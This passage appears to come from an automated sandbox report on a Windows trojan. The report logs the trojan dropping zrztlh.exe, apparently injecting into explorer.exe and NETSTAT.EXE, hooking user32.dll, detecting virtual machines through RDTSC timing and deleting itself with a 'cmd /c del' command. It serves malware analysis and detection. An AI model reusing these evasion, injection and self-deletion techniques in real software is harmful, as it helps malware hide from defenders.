          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DA3E0 NtReadFile,10_2_007DA3E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DA460 NtClose,10_2_007DA460
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DA510 NtAllocateVirtualMemory,10_2_007DA510
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DA32A NtCreateFile,10_2_007DA32A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DA3DB NtReadFile,10_2_007DA3DB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DA45A NtClose,10_2_007DA45A
          Source: O1ySvN9SvL.exeVirustotal: Detection: 49%
          Source: O1ySvN9SvL.exeReversingLabs: Detection: 53%
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeFile read: C:\Users\user\Desktop\O1ySvN9SvL.exeJump to behavior
          Source: O1ySvN9SvL.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\O1ySvN9SvL.exe "C:\Users\user\Desktop\O1ySvN9SvL.exe"
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeProcess created: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeProcess created: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\zrztlh.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeProcess created: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemxJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeProcess created: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemxJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\zrztlh.exe"Jump to behavior
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeFile created: C:\Users\user\AppData\Local\Temp\nsr4D4D.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@2/1
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_00402078 CoCreateInstance,MultiByteToWideChar,0_2_00402078
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404333
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5704:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: netstat.pdbGCTL source: zrztlh.exe, 00000002.00000002.533807993.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532341402.0000000000D99000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\bbzbv\zvllpn\ulml\6c213aee395f4218a983d22c1476bfe1\cpuiyl\nereonvn\Release\nereonvn.pdb source: O1ySvN9SvL.exe, 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp, O1ySvN9SvL.exe, 00000000.00000002.476520590.0000000002857000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000000.435751978.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, zrztlh.exe, 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, zrztlh.exe, 00000002.00000000.441820881.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, NETSTAT.EXE, 0000000A.00000002.719075583.000000000385F000.00000004.10000000.00040000.00000000.sdmp, zrztlh.exe.0.dr, nsr4D4E.tmp.0.dr
          Source: Binary string: netstat.pdb source: zrztlh.exe, 00000002.00000002.533807993.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532341402.0000000000D99000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: zrztlh.exe, 00000001.00000003.439382237.0000000002430000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000003.440475430.000000001D330000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000003.449985411.000000000108A000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532918261.000000000133F000.00000040.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532513113.0000000001220000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.533826728.0000000003199000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.532287288.0000000000E78000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zrztlh.exe, 00000001.00000003.439382237.0000000002430000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000003.440475430.000000001D330000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000003.449985411.000000000108A000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532918261.000000000133F000.00000040.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532513113.0000000001220000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.533826728.0000000003199000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.532287288.0000000000E78000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EAF225 push ecx; ret 1_2_00EAF238
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0040E309 push ds; ret 2_2_0040E313
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0040E452 push ebp; ret 2_2_0040E453
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041C403 pushad ; iretd 2_2_0041C40D
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041D4D2 push eax; ret 2_2_0041D4D8
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041D4DB push eax; ret 2_2_0041D542
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041D485 push eax; ret 2_2_0041D4D8
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00416567 push 4E87C1F6h; iretd 2_2_00416572
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00417D75 push ebx; iretd 2_2_00417D78
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041D53C push eax; ret 2_2_0041D542
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041668F push ecx; iretd 2_2_0041669F
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0040AFA3 push cs; retf 2_2_0040AFA8
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EAF225 push ecx; ret 2_2_00EAF238
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033AD0D1 push ecx; ret 10_2_033AD0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007CE309 push ds; ret 10_2_007CE313
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007CE452 push ebp; ret 10_2_007CE453
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DC403 pushad ; iretd 10_2_007DC40D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DD4DB push eax; ret 10_2_007DD542
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DD4D2 push eax; ret 10_2_007DD4D8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DD485 push eax; ret 10_2_007DD4D8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007D7D75 push ebx; iretd 10_2_007D7D78
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007D6567 push 4E87C1F6h; iretd 10_2_007D6572
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DD53C push eax; ret 10_2_007DD542
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007D668F push ecx; iretd 10_2_007D669F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007CAFA3 push cs; retf 10_2_007CAFA8
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DDA
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeFile created: C:\Users\user\AppData\Local\Temp\zrztlh.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEE
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000007C9904 second address: 00000000007C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000007C9B7E second address: 00000000007C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6876Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7104Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-11669
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeAPI coverage: 9.5 %
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeAPI coverage: 3.4 %
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 9.8 %
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405426
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405D9C
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_004026A1 FindFirstFileA,0_2_004026A1
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeAPI call chain: ExitProcess graph end nodegraph_0-3361
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeAPI call chain: ExitProcess graph end nodegraph_1-11670
          Source: explorer.exe, 00000003.00000000.475786546.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.476567949.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
          Source: explorer.exe, 00000003.00000000.476567949.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.476567949.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.512235091.0000000006915000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.476567949.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.497195090.0000000007F92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EB57E5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00EB57E5
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EB57E5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00EB57E5
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DDA
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EB6AAA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_00EB6AAA
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338E730 mov eax, dword ptr fs:[00000030h]10_2_0338E730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03428B58 mov eax, dword ptr fs:[00000030h]10_2_03428B58
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03354F2E mov eax, dword ptr fs:[00000030h]10_2_03354F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03354F2E mov eax, dword ptr fs:[00000030h]10_2_03354F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337F716 mov eax, dword ptr fs:[00000030h]10_2_0337F716
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03428F6A mov eax, dword ptr fs:[00000030h]10_2_03428F6A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EFF10 mov eax, dword ptr fs:[00000030h]10_2_033EFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EFF10 mov eax, dword ptr fs:[00000030h]10_2_033EFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338A70E mov eax, dword ptr fs:[00000030h]10_2_0338A70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338A70E mov eax, dword ptr fs:[00000030h]10_2_0338A70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03383B7A mov eax, dword ptr fs:[00000030h]10_2_03383B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03383B7A mov eax, dword ptr fs:[00000030h]10_2_03383B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0342070D mov eax, dword ptr fs:[00000030h]10_2_0342070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0342070D mov eax, dword ptr fs:[00000030h]10_2_0342070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335DB60 mov ecx, dword ptr fs:[00000030h]10_2_0335DB60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336FF60 mov eax, dword ptr fs:[00000030h]10_2_0336FF60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0341131B mov eax, dword ptr fs:[00000030h]10_2_0341131B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335F358 mov eax, dword ptr fs:[00000030h]10_2_0335F358
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335DB40 mov eax, dword ptr fs:[00000030h]10_2_0335DB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336EF40 mov eax, dword ptr fs:[00000030h]10_2_0336EF40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03384BAD mov eax, dword ptr fs:[00000030h]10_2_03384BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03384BAD mov eax, dword ptr fs:[00000030h]10_2_03384BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03384BAD mov eax, dword ptr fs:[00000030h]10_2_03384BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03368794 mov eax, dword ptr fs:[00000030h]10_2_03368794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338B390 mov eax, dword ptr fs:[00000030h]10_2_0338B390
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D7794 mov eax, dword ptr fs:[00000030h]10_2_033D7794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D7794 mov eax, dword ptr fs:[00000030h]10_2_033D7794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D7794 mov eax, dword ptr fs:[00000030h]10_2_033D7794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03382397 mov eax, dword ptr fs:[00000030h]10_2_03382397
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03361B8F mov eax, dword ptr fs:[00000030h]10_2_03361B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03361B8F mov eax, dword ptr fs:[00000030h]10_2_03361B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0340D380 mov ecx, dword ptr fs:[00000030h]10_2_0340D380
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0341138A mov eax, dword ptr fs:[00000030h]10_2_0341138A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033937F5 mov eax, dword ptr fs:[00000030h]10_2_033937F5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033803E2 mov eax, dword ptr fs:[00000030h]10_2_033803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033803E2 mov eax, dword ptr fs:[00000030h]10_2_033803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033803E2 mov eax, dword ptr fs:[00000030h]10_2_033803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033803E2 mov eax, dword ptr fs:[00000030h]10_2_033803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033803E2 mov eax, dword ptr fs:[00000030h]10_2_033803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033803E2 mov eax, dword ptr fs:[00000030h]10_2_033803E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337DBE9 mov eax, dword ptr fs:[00000030h]10_2_0337DBE9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03425BA5 mov eax, dword ptr fs:[00000030h]10_2_03425BA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D53CA mov eax, dword ptr fs:[00000030h]10_2_033D53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D53CA mov eax, dword ptr fs:[00000030h]10_2_033D53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335E620 mov eax, dword ptr fs:[00000030h]10_2_0335E620
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03394A2C mov eax, dword ptr fs:[00000030h]10_2_03394A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03394A2C mov eax, dword ptr fs:[00000030h]10_2_03394A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0340B260 mov eax, dword ptr fs:[00000030h]10_2_0340B260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0340B260 mov eax, dword ptr fs:[00000030h]10_2_0340B260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03428A62 mov eax, dword ptr fs:[00000030h]10_2_03428A62
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335AA16 mov eax, dword ptr fs:[00000030h]10_2_0335AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335AA16 mov eax, dword ptr fs:[00000030h]10_2_0335AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338A61C mov eax, dword ptr fs:[00000030h]10_2_0338A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338A61C mov eax, dword ptr fs:[00000030h]10_2_0338A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03355210 mov eax, dword ptr fs:[00000030h]10_2_03355210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03355210 mov ecx, dword ptr fs:[00000030h]10_2_03355210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03355210 mov eax, dword ptr fs:[00000030h]10_2_03355210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03355210 mov eax, dword ptr fs:[00000030h]10_2_03355210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03373A1C mov eax, dword ptr fs:[00000030h]10_2_03373A1C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335C600 mov eax, dword ptr fs:[00000030h]10_2_0335C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335C600 mov eax, dword ptr fs:[00000030h]10_2_0335C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335C600 mov eax, dword ptr fs:[00000030h]10_2_0335C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03388E00 mov eax, dword ptr fs:[00000030h]10_2_03388E00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03368A0A mov eax, dword ptr fs:[00000030h]10_2_03368A0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0339927A mov eax, dword ptr fs:[00000030h]10_2_0339927A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337AE73 mov eax, dword ptr fs:[00000030h]10_2_0337AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337AE73 mov eax, dword ptr fs:[00000030h]10_2_0337AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337AE73 mov eax, dword ptr fs:[00000030h]10_2_0337AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337AE73 mov eax, dword ptr fs:[00000030h]10_2_0337AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337AE73 mov eax, dword ptr fs:[00000030h]10_2_0337AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411608 mov eax, dword ptr fs:[00000030h]10_2_03411608
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336766D mov eax, dword ptr fs:[00000030h]10_2_0336766D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033E4257 mov eax, dword ptr fs:[00000030h]10_2_033E4257
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03359240 mov eax, dword ptr fs:[00000030h]10_2_03359240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03359240 mov eax, dword ptr fs:[00000030h]10_2_03359240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03359240 mov eax, dword ptr fs:[00000030h]10_2_03359240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03359240 mov eax, dword ptr fs:[00000030h]10_2_03359240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03367E41 mov eax, dword ptr fs:[00000030h]10_2_03367E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03367E41 mov eax, dword ptr fs:[00000030h]10_2_03367E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03367E41 mov eax, dword ptr fs:[00000030h]10_2_03367E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03367E41 mov eax, dword ptr fs:[00000030h]10_2_03367E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03367E41 mov eax, dword ptr fs:[00000030h]10_2_03367E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03367E41 mov eax, dword ptr fs:[00000030h]10_2_03367E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0340FE3F mov eax, dword ptr fs:[00000030h]10_2_0340FE3F
